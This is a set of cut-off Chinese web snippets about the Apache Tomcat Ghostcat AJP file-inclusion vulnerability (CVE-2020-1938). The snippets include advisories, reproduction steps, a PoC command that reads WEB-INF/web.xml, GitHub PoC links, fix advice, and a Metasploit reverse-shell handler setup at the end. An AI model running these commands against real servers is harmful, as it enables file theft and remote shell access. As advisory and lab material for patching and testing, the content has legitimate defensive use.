2020年1月6日,国家信息安全漏洞共享平台(CNVD) 发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。 该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。利用方式属于文...
一、详细说明:其中包括场景、截图、漏洞重现的方法,涉及账号相关漏洞,请提供测试账号。 1、场景:在进入到内网后,且远程tomcat8009后能通的情况下,Apache Tomcat 8 < 8.5.51 时候可以通过ajp读取代码文件;当前部分tomcat版本在8.5.13会有此漏洞。 2、截图: 3、漏洞重现方法: 3.1ROOT下写一个jsp文件 #cat tomcat...
Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tomcat AJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下...
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。 CNVD-2020-10487/CVE-2020-1938是文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目...
1、CNVD-2020-10487-Tomcat-Ajp-lfi //可用来验证读取文件 2、2020-10487.py //py3的脚本,搭配文件上传可执行rce 3、ajpfuzzer_v0.6.jar //AJP构造器,用来搭配msf直接拿shell 个人看法: 此漏洞对于大多数企业来说危害性并不是特别大,首先8009端口必须对外映射(此处只考虑外网入侵方式),因此企业可以通过查映射...
11 - 命令为 python ./ CNVD-2020-10487-Tomcat-Ajp-lfi.py 本地ip –p 8009 –f WEB-INF/web.xml 12 - 执行成功后可以看到成功访问到该文件。 13 -  1 + # Apache-Tomcat-Ajp LFI 2 + ## 漏洞编号 ...
2.https://www.freebuf.com/column/234123.html 3.https://www.freebuf.com/column/227973.html 4.https://www.freebuf.com/news/232748.html 5. poc代码:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py...
关于Ghostcat(幽灵猫CVE-2020-1938漏洞):CNVD-2020-10487(CVE-2020-1938), tomcat ajp 文件读取漏洞poc|Java版本POC|Tomcat-Ajp协议文件读取漏洞|又一个python版本CVE-2020-1938漏洞检测|CVE-2020-1938-漏洞复现环境及EXP CVE-2020-8840:Jackson-databind远程命令执行漏洞(或影响fastjson) CVE-2020-8813-Cacti v1.2...
python./CNVD-2020-10487-Tomcat-Ajp-lfi.py 本地ip –p8009–fWEB-INF/web.xml 执行成功后可以看到成功访问到该文件。 0x06 修复方式 1、临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port="8009" protocol="AJP/1.3"redirectPort="8443" /> ...
https:///nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC Kali打开MSF msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.114.173 ...